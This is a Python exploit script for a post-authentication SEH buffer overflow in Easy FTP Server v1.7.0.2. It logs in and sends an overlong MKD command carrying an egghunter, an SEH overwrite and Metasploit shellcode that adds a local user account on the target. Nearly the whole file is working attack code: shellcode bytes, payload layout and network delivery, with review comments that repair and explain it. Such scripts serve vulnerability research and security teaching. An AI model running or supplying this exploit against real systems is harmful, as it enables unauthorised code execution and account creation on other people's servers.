
# Title : Easy Ftp Server v1.7.0.2 Post-Authentication BoF
# Published : 2011-06-01
# Author : b33f


			
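#!/usr/bin/python
# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
# Original Author: dookie2000ca || Windows XP SP3 Professional
# Author: b33f - Ruben Boonen
# Windows XP Home SP1
# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
#
# Usage: python <this file> [target_ip [port]]   (defaults: 192.168.1.70, 21)
#
# NOTE(review): the byte strings below were restored from a rendering that had
# replaced every backslash with a forward slash ("/x66", "/r/n").  0x2f ('/')
# and 0x5c ('\') are both on the bad-character list, so the slash form can never
# have been what was sent; all escapes are "\x.." again and the line endings are
# "\r\n".  Literals are bytes so the escapes mean raw octets on Python 2 and 3.

import socket
import sys

# -------------------------------------------------------------------------------
# SE Handler is overwritten - offset to nSEH 256
# nSEH = short jump \xEB\x07 (skips the 4-byte handler address + 2 NOPs)
# SEH  = pop pop ret in rpcrt4.dll @ 0x78011926 - taken from the author's XP box;
#        this is OS/service-pack specific, re-locate it (and check the module is
#        not SafeSEH-protected) before using this against any other build
# badchars 0x00 0x0a 0x2f 0x5c
# -------------------------------------------------------------------------------

TARGET_IP = "192.168.1.70"
TARGET_PORT = 21
FTP_USER = b"b33f"
FTP_PASS = b"b33f"
NSEH_OFFSET = 256          # where nSEH lands inside the MKD argument
EGG = b"w00tw00t"          # the egghunter looks for the doubled 4-byte tag
SOCKET_TIMEOUT = 10.0      # seconds; the service may die or hang after MKD

# 32-byte egghunter; scans memory for EGG and jumps to the bytes after it.
bunny = (
    b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
    b"\x77\x30\x30\x74"  # egghunter marker w00t
    b"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
)

# win32_adduser - PASS=u EXITFUNC=seh USER=fuck Size=228 Encoder=ShikataGaNai
# WARNING: this payload creates a local account on the target; only run it
# against a host you are authorised to test.
# NOTE(review): the Metasploit header says Size=228 but the blob as pasted is
# 231 bytes, and 7 + 8 + 231 + 10 = 256 is exactly the nSEH offset documented
# above, so the layout was built around the 231-byte blob.
shellcode = (
    b"\xdb\xd3\x31\xc9\xb8\x5d\x82\xf8\x52\xb1\x34\xd9\x74\x24\xf4\x5f"
    b"\x83\xc7\x04\x31\x47\x13\x03\x1a\x91\x1a\xa7\x58\x7d\x9e\x48\xa0"
    b"\x7e\x94\x0c\x9c\xf5\xd6\x8b\xa4\x08\xc8\x1f\x1b\x13\x9d\x7f\x83"
    b"\x22\x4a\x36\x48\x10\x07\xc8\xa0\x68\xd7\x52\x90\x0f\x17\x10\xef"
    b"\xce\x52\xd4\xee\x12\x89\x13\xcb\xc6\x6a\xd8\x5e\x02\xf9\xbf\x84"
    b"\xcd\x15\x59\x4f\xc1\xa2\x2d\x10\xc6\x35\xd9\x25\xea\xbe\x1c\xd2"
    b"\x9a\x9d\x3a\x20\x5e\x2c\x83\x4c\xeb\x0f\x33\x09\x2b\xf7\x3f\x9a"
    b"\xec\x04\xcb\xec\xf0\xb9\x40\x64\x01\x29\x5f\xff\x91\x1d\x60\xff"
    b"\x91\xd6\x09\xc3\xce\xd9\x3f\x5b\xa7\x90\x38\x18\x87\xd8\xe8\x76"
    b"\xf8\x95\x0d\xd9\x90\x31\xf3\x6f\x6e\x15\xf3\x88\x0c\xf4\x6f\x78"
    b"\xb6\x7e\x15\xa4\x17\x1c\xf5\xca\x02\x96\xd5\x67\xbe\x33\x64\xa7"
    b"\x26\xc9\xeb\xcc\x86\x44\xcc\x3d\x86\xe2\x48\x61\x2e\xcd\x70\x0f"
    b"\x4b\x65\x51\xa3\xfc\xe6\xf0\x57\x64\x9b\x9d\xd2\x1a\x7b\x23\x78"
    b"\xb6\x12\xcd\xe9\x3b\x91\x63\x88\xcf\x36\xf6\x39\x10\xaf\x83\xde"
    b"\x3b\x0f\x43\x61\xf8\x0b\x9b"
)


def build_payload(shellcode=shellcode, egghunter=bunny):
    """Return the MKD argument (bytes) that overwrites the SEH chain.

    Layout, offsets in bytes:
      0    7 x 'A'
      7    EGG ("w00tw00t")
      15   shellcode
      ...  'A' filler sized so that nSEH lands at NSEH_OFFSET (10 bytes for the
           default 231-byte shellcode, exactly as in the original)
      256  nSEH: \xEB\x07\x90\x90
      260  SEH:  \x26\x19\x01\x78 (0x78011926, little-endian)
      264  25 x NOP slide into the egghunter
      289  egghunter (32 bytes)
      321  133 x 'A' tail padding (kept from the original)

    Raises:
        ValueError: if the shellcode is too long to fit before NSEH_OFFSET.
    """
    prefix = b"A" * 7 + EGG + shellcode
    filler_len = NSEH_OFFSET - len(prefix)
    if filler_len < 0:
        raise ValueError("shellcode is %d bytes too long to fit before nSEH"
                         % -filler_len)
    return (
        prefix
        + b"A" * filler_len
        + b"\xEB\x07\x90\x90"   # nSEH: jmp short +7
        + b"\x26\x19\x01\x78"   # SEH: pop pop ret (rpcrt4.dll 0x78011926)
        + b"\x90" * 25
        + egghunter
        + b"A" * 133
    )


def main(argv=None):
    """Log in with FTP_USER/FTP_PASS and send the overflowing MKD.

    Args:
        argv: optional [host, port]; defaults to sys.argv[1:], then to
              TARGET_IP / TARGET_PORT.  Returns nothing; the only result is the
              effect on the remote service.
    """
    if argv is None:
        argv = sys.argv[1:]
    host = argv[0] if argv else TARGET_IP
    port = int(argv[1]) if len(argv) > 1 else TARGET_PORT
    payload = build_payload()

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(SOCKET_TIMEOUT)
    try:
        s.connect((host, port))
        s.recv(1024)                               # banner
        s.send(b"USER " + FTP_USER + b"\r\n")
        s.recv(1024)
        s.send(b"PASS " + FTP_PASS + b"\r\n")
        s.recv(1024)
        s.send(b"MKD " + payload + b"\r\n")
        # After the overflow the server may reset, hang or never answer; none
        # of those is an error from the attacker's point of view.
        try:
            s.recv(1024)
            s.send(b"QUIT\r\n")
        except socket.error:
            pass
    finally:
        s.close()   # original had a bare `s.close` (no call) and leaked the socket


if __name__ == "__main__":
    main()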